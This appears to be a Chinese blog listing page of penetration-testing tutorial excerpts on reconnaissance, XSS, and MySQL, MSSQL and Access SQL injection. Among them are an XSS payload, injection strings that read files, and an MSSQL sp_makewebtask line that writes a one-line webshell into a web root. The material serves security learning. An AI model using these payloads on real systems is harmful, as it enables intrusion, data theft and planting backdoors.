- 博客(54)
- 资源 (4)
- 收藏
- 关注

原创 渗透测试之信息收集
目录信息收集资产收集寻找真实ip端口扫描旁站C段子域名探测搜索引擎找资产指纹识别资产管理信息收集信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。正所谓,知己知彼百战百胜!信息收集的方式可以分为两种:主动和被动。主动信息收集:通过直接访问、扫描网站,这种流量将流经网站被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等资产收集寻找真实ip端口扫描旁站C段子域名探
2020-12-11 22:50:35
1197
4
原创 XSS详解
目录XSS简介XSS漏洞分类XSS漏洞攻击过程XSS漏洞危害XSS漏洞的挖掘XSS利用方式XSS过滤绕过XSS防御方式XSS工具手工挖掘工具自动化工具XSS简介跨站脚本攻击—XSS(Cross Site Script),是指攻击者通过在Web页面中写入恶意脚本,造成用户在浏览页面时,控制用户浏览器进行操作的攻击方式,该漏洞发生在用户端,在渲染过程中发生了不在预期过程中的JavaScript代码执行。假设,在一个服务端上,有一处功能使用了这段代码,他的功能是将用户输入的内容输出到页面上,很常见的一个功能。
2021-01-20 19:50:59
812
原创 XSS漏洞攻击过程
目录反射型XSS漏洞存储型XSS漏洞XSS总结反射型XSS漏洞Alice经常浏览某个网站,此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录,并存储了Alice敏感信息(比如银行帐户信息)。Tom 发现 Bob的站点存在反射性的XSS漏洞Tom 利用Bob网站的反射型XSS漏洞编写了一个exp,做成链接的形式,并利用各种手段诱使Alice点击Alice在登录到Bob的站点后,浏览了 Tom 提供的恶意链接嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感
2021-01-20 19:49:04
790
原创 XSS漏洞分类
目录反射型XSS储存型XSS反射型XSS与存储型XSS的区别DOM XSS可能触发DOM型xss的属性DOM型例子Blind XSSXSS总结反射型XSS反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:<?php echo "<p>hello, $_GET['user']</p>";?> ,那么在访问时设置 /?user=</p><script>alert("hack")</script><
2021-01-20 19:46:57
702
原创 XSS漏洞挖掘
目录黑盒测试白盒测试(代码审计)XSS的攻击载荷XSS可以插在哪里tipsXSS总结黑盒测试尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:URL的每一个参数URL本身表单搜索框常见业务场景重灾区:评论区、留言区、个人信息、订单信息等针对型:站内信、网页即时通讯、私信、意见反馈存在风险:搜索框、当前目录、图片属性等白盒测试(代码审计)关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。PHP中常见的接收参数的方式有$_GET、$_POST、$_
2021-01-20 19:45:45
689
原创 XSS利用方式
目录xss平台利用xss平台地址创建过程页面操作xss直接弹出cookieXSS总结xss平台利用xss平台地址xss.fbisb.com 这个平台上有众多的xss代码创建过程点击的项目进行创建![[Pasted image 20210109141006.png]]进入项目创建的构造框,我们进行项目的描述![[Pasted image 20210109141019.png]]配置代码 勾选默认模块与keepsession![[Pasted image 20210109141102.png
2021-01-20 19:44:16
583
原创 XSS过滤绕过
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
2021-01-20 19:40:56
1664
原创 XSS防御方式
更多请跳转 XSS总结XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码。也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。对输入的内容进行过滤,可以分为黑名单过滤和白名单过滤。黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险。白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的。对输出进行ht
2021-01-20 19:39:15
829
原创 MYSQL报错注入
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错审计思路代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。常用报错检测符号:’ \ ; %00 ) ( # "报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
2021-01-08 23:40:45
3680
6
原创 MYSQL注入详解
目录注入简介注入类型联合注入报错注入盲注攻击次数二次注入约束攻击堆叠注入绕过魔术引号读写函数注入函数注入符号注入语句待补充内容注入简介目前的web大多是前后端分离,在固定前端页面上,通过不同参数去调用数据中的内容,如果这个过程中我们拼接了恶意语句并且没有被过滤掉,那么数据库很有可能会执行我们的恶意语句,从而导致攻击者可以通过拼接恶意语句来达到操作数据库,获得数据库的敏感信息,产生极大的危害常见例子http://127.0.0.1/news.php?id=1select * from news wh
2021-01-08 23:39:39
691
原创 MYSQL注入语句
常用词汇information_schemainformation_schema.schemata 查库名 [[注入函数#系统信息函数]]information_schema.tables 查表名table_schema 指定表的数据库table_name 表名column_name 列名变量形式table_schema=database(),[[hex编码]],[[char()]]不用单引号:select ‘root’(英文形式的单引号)select ch
2021-01-08 23:19:40
462
原创 MYSQL注入函数
系统信息函数函数说明USER()获取当前操作句柄的用户名,同SESSION_USER()、CURRENT_USER(),有时也用SYSTEM_USER()。DATABASE()获取当前选择的数据库名,同SCHEMA()。VERSION()获取当前版本信息。常见全局变量变量说明@@VERSION返回版本信息@@HOSTNAME返回安装的计算机名称@@GLOBAL.VERSION同@@VERSION@@BASEDIR返
2021-01-08 23:16:18
540
原创 MYSQL注入符号
注释符单行注释单行注释单行注释多行(内联)注释#-- x //x为任意字符;%00/*任意内容*/# 单行注释,实际渗透中最好用之前用url编码下,效果会更好,编码后的值为 %23-- - 注意中间的空格-- +(空格)`` 在bypass一些比较老的waf可能还会有些用/**/ 多行注释/*!*/ 内联注释/*!50000 */ mysql 5通用,带版本内联注释常用运算符运算符说明运算符说明&&与,同and。
2021-01-08 23:10:33
464
原创 MySQL魔术引号绕过
目录绕过魔术引号简介绕过绕过魔术引号简介现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等
2021-01-08 23:06:58
1255
原创 MySQL盲注
这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充布尔盲注盲注一般先看长度id=4 and length(user())=14布尔盲注的方法substr,substring,mid,left,right截取单个字符id=4 and substr((select user()),1,1)=0x72id=4 and left((select user()),1)=0x72用ascii(),or
2021-01-08 23:01:42
776
原创 MYSQL联合注入
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句简介联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截特定变量1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。2\. TABLES 表 : 提供了关于数据库中的表的信息。3\. C
2021-01-08 22:56:39
531
原创 MYSQL的二次注入和约束攻击
目录二次注入约束攻击二次注入简介在第一次进行数据库插入数据的时候,过滤不严格,在写入数据库的时候还是保留了原来的数据,但是数据本身还是恶意数据。在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。例子select * from users where user
2021-01-08 22:50:58
429
原创 MySQL堆叠注入
目录堆叠注入简介对照表格语句堆叠注入简介堆叠注入在mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句,堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库对照表格PHP连接MySQL数据库有三种方式(MySQL、Mysqli、PDO),同时官方对三者也做了列表性比较:MysqliPDOMySQL引入的PHP版本5.05.0
2021-01-05 23:12:19
393
原创 MySQL读写函数
目录读写函数读取函数 load_file写入函数 into outfile读写函数可以写Linux的一个/可以写Windows的\\可以写成16进制 (防止魔术引号对查询结果的影响)可以使用url编码(防止魔术引号对查询结果的影响)路径引用可以使用单引号(‘)或者双引号(“)读取函数 load_file条件:知道文件的绝对路径配合着联合查询进行使用id=\-13 union select 1,load\_file(‘c:/inetpub/wwwroot/8006/index.
2021-01-05 22:52:59
381
原创 电脑常用快捷键
系统快捷键快捷键:win+* 系统相关的操作win键 + Ctrl + D 建立新的桌面win键 + Ctrl + 左方向键/右方向键 左右切换桌面win键 + Ctrl键 + F4 关闭桌面也可以使用win键 + Tab键,在右上角直接点击新建桌面和桌面的切换win键 + Tab键 中可以使用鼠标按住拖动在用程序到其他桌面, 桌面和任务的切换win10 建立新建桌面 快捷键Alt键 + Tab键 同一桌面内的运行程序的切换鼠标快捷键快捷键说明按住 Ctrl
2021-01-01 17:02:37
4994
5
原创 【抢茅台脚本】,教程详情(仅供参考,现在估计不能用了)
原项目:https://github.com/huanghyw/jd_seckill现原作者已删除。笔者已打包,百度云:链接:https://pan.baidu.com/s/1I4IeIt7NgZLq019RVHbNOQ提取码:1qaz环境搭建第一步:把百度云的资源下载到本地并解压第二步:安装运行脚本所需环境python3 -m pip install -r requirements.txt以上是以安装完成的图片,缺什么库,就百度安装什么库。如此你的运行环境就搭建好了。准备工作在
2021-01-01 11:53:01
54061
78
原创 MSSQL注入详解
目录MSSQL注入总结库的介绍注入分类语句总结联合注入报错注入盲注(布尔-时间-OOB)上马与组件扩展注入绕过MSSQL注入总结库的介绍注入分类语句总结联合注入报错注入盲注(布尔-时间-OOB)上马与组件扩展注入绕过...
2020-12-24 13:48:00
701
4
原创 MSSQL注入绕过
目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾绕过特性前言我们经常利用一些数据库特性来进行WAF绕过。在MSSQL中,比如可以这样:浮点数形式:id=1.1union select科学计数法形式:id=1e0union select但其实还可以这样子:id=1.eunion select通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSs
2020-12-24 13:40:39
1634
原创 MSSQL注入语句总结
目录:基础语句注入点权限判断获取数据库获取指定数据库中的表的列的数据库判断数据库级别的角色SQL特性:关于mssql的注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据。基础语句select ***://查询指令@@version // 数据库版本system_user //系统用户名suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作user //获取当前数据
2020-12-24 13:34:58
1610
原创 MSSQL之上马与组件扩展
目录:Mssql上马1. 利用sp\_makewebtask写入一句话木马2. dbowner权限下写一句话组件扩展堆叠注入下的扩展运用Mssql上马1. 利用sp_makewebtask写入一句话木马1 . 修复上传;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''--
2020-12-24 13:33:18
467
1
原创 MSSQL之盲注
目录:布尔盲注第一步 判断注入第二步 猜解列数第三步 猜数据库名,表名:第四步 猜解字段第五步 判断字段长度第六步 猜解字段内容时间盲注利用条件注入语句OOB 注入利用条件原理检测利用/渗出布尔盲注总结:布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。第一步 判断注入and 1=1and 1=2第二步 猜解列数order by 1 #返回正确order by 2 #返回正确order by 3 #抛出错误第三步 猜数据库名
2020-12-24 13:29:12
1392
原创 MSSQL之联合注入
本章目录:联合查询注入语句利用回显点权限判断查库:查表:查列名:查列内容:联合注入例:联合查询注入语句第一步 判断注入and 1=1and 1=2第二步 猜解列数(字段长度)order by 1 返回正确order by 2 返回正确order by 3 出现错误?id=-2union all select null,null,null,null--//在第四个的时候页面显示正常,说明字段为4?id=2and 1=(select is_srvrolemember(‘sysadm
2020-12-24 13:27:13
2195
原创 MSSQL注入库的介绍
本章目录:Mssql简介Mssql 服务、端口、后缀默认库的介绍字段的介绍数据库部分代码语句分析调用数据库代码创建数据库数据库的读写文件Mssql简介Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system。为了迎合新的版本我以后文章的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给
2020-12-24 13:24:16
440
原创 access注入详解
目录Access数据库手工注入判断注入点判断数据库类型判断可以进行什么类型的注入联合注入1. 判断存在的字段数2. 作用:可以用来判断查询语句所在的表到底有多少个字段3. 猜解表名4. 猜解列名5. 猜解表名列名布尔盲注判断有无admin 这个表判断有无password这个列判断有数据长度偏移注入注入原理判断多少个列查询表的列数偏移注入移位溢注正文1. 判断字段长度2.判断表名3. 判断表长4. 开始偏移Access数据库是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很
2020-12-23 19:15:06
1638
1
原创 学习方法论
目录学习方法论为什么你必须要建立外脑如何构建外脑?什么是好的外脑呢如何真正运用好外脑外脑构建内容理念结构化思维全局化思维渐进式总结放下思维的包袱忘的越快,学的越快一起爱上学习新东方创始人俞敏洪说:“要鼓励青少年做事研究方法论”。不讲求方法只管努力,就如同蒙上奔跑,很可能在错误的方向上越跑越远。学习方法论知识的挑战不在于获取知识。在我们的数字世界里,你几乎可以在任何时候获得几乎任何知识。真正的挑战在于,知道什么知识有价值,并且建立一个系统,将其中的部分知识跨跃时距传递,将现在学习到的知识存储
2020-12-15 21:32:45
1632
5
原创 新时代笔记软件的优缺点
现代两种笔记管理方式现代笔记管理软件中对笔记的管理方式,最常见的就是文件夹管理和标签管理。文件夹管理的方式弊端非常明显,由于一篇笔记只能存放在一个文件夹下,所以它严重限制了一篇笔记被发现的几率,阻碍创意或者灵感的产生。跟它明显对比的就是标签管理法。标签管理的方式看似比较合理,一篇笔记可以根据实际的分类打上不同的标签,这样提高了笔记被发现的几率。但是仍然存在几个问题:通过标签找到一篇笔记后,如果我们顺着这个笔记的其他标签继续往下寻找新的笔记,往往会迷失了方向,很难能够原路返回(当然这一点
2020-12-15 20:11:04
675
原创 著名的学习方法论
目录著名的学习方法罗斯福的专注力费曼学习法西蒙学习法达芬奇的笔记SQ3R阅读法番茄学习法东京大学笔记法康奈尔笔记法著名的学习方法罗斯福的专注力高强度的专注学习。费曼学习法将被动学习转化为主动学习,从而大幅的提高对知识的吸收理解。具体做法:选择一个学习主题,开始阅读关于它的所有资料,做必要的笔记。假装你在教室里向学生解释这个主题,用尽量简单的词汇去描述它,力求学生能听懂。当你讲解卡壳的时候,再回头阅读资料,弄清楚再继续讲解。回到第一步,试图用更加简洁、直白的语言去讲述概念。西
2020-12-14 23:43:14
919
4
原创 绕过cdn探测真实ip方法大全
渗透测试过程中,需要寻找真实IP的情况,就是目标使用了cdn。CDN现在大多数的网站都开启了CDN加速,导致我们获取到的IP地址不一定是真实的IP地址。CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息
2020-12-14 21:12:07
7922
5
原创 常见端口对应的漏洞利用方式
目录常见端口对应的漏洞利用方式文件共享服务端口远程连接服务端口Web应用服务端口数据库服务端口邮件服务端口网络参加协议端口特殊服务端口常见端口对应的漏洞利用方式端口服务入侵方式21ftp/tftp/vsftpd文件传输协议爆破/嗅探/溢出/后门22ssh远程连接爆破/openssh漏洞23Telnet远程连接爆破/嗅探/弱口令25SMTP邮件服务邮件伪造53DNS域名解析系统域传送/劫持/缓存投毒/欺骗67/68dhcp服务劫持
2020-12-14 10:38:16
2555
1
原创 子域名探测
子域名探测通过收集子域名信息来进行渗透是目前常见的一种手法。子域名信息收集可以通过手工,也可以通过工具,还可以通过普通及漏洞搜索引擎来进行分析。在挖SRC漏洞时,子域名信息的收集至关重要!为什么要进行子域名探测?子域名探测可以帮我们发现渗透测试中更多的服务,这将增加发现漏洞的可能性查找一些用户上较少,被人遗忘的子域名,其上运行的应用程序可能会使我们发现关键漏洞通常,同一组织的不同域名/应用程序中存在相同的漏洞子域名中的常见资产类型一般包括办公系统,邮箱系统,论坛,商城等,其他管理系统
2020-12-12 13:35:24
1487
原创 网站资产管理
目录资产管理ARLAUTOEARNTide-Marsbayonetbufferfly资产管理ARL旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统AUTOEARNAUTO-EARN是一个利用OneForAll(https://github.com/shmilylty/OneForAll)进行子域收集、Shodan A
2020-12-11 22:47:30
756
4
原创 信息收集之指纹识别
指纹识别在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。在线指纹识别网站:TSscan:https://scan.top15.cn/web/BugScaner:http://whatweb.bugscaner.com/look/云悉指纹:http://www.yunsee.cn/finger.htmlWhatWeb:http://whatweb.bugscaner.com/look/常见的
2020-12-11 22:16:43
4115
6
原创 敏感文件目录探测
目录敏感文件目录探测探测方法常见敏感文件或目录常用后台工具扫描web 爬虫搜索引擎文件路径查看源码源码审计漏洞利用社会工程专门的技术支持目录旁站C段子域名敏感文件目录探测敏感文件、敏感目录挖掘一般都是靠工具、脚本来找,当然大佬手工也能找得到。探测方法常见敏感文件或目录通常我们所说的敏感文件、敏感目录大概有以下几种:后台robots.txt数据库logsitemap.xmlmysql.sqllicence.txtGithg/Mercurialsvn/Subversionbzr/
2020-12-11 22:01:37
2479
8
原创 物理路径探测
目录物理路径报错后台功能点搜索引擎容器特性文件泄露瞎蒙大法物理路径报错【报错获得】在处理报错信息的问题上如果处理不当,就可导致路径信息泄露,比如访问一些不存在的文件等思路。这里的报错方法就很多了,说不完的,具体还要根据实际情况操作。下面说几种实用的↓1.有动态URL的地方可以替换参数 替换参数值为不存在的,很多时候都能爆物理路径2.访问不存在的文件名 文件 或者改正常后缀为不支持的后缀。IIS7.0以上,如果没有修改404页面,只要浏览web任意不存在的文件,都会直接暴出绝对路径。同理,
2020-12-11 21:16:53
2109
6
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人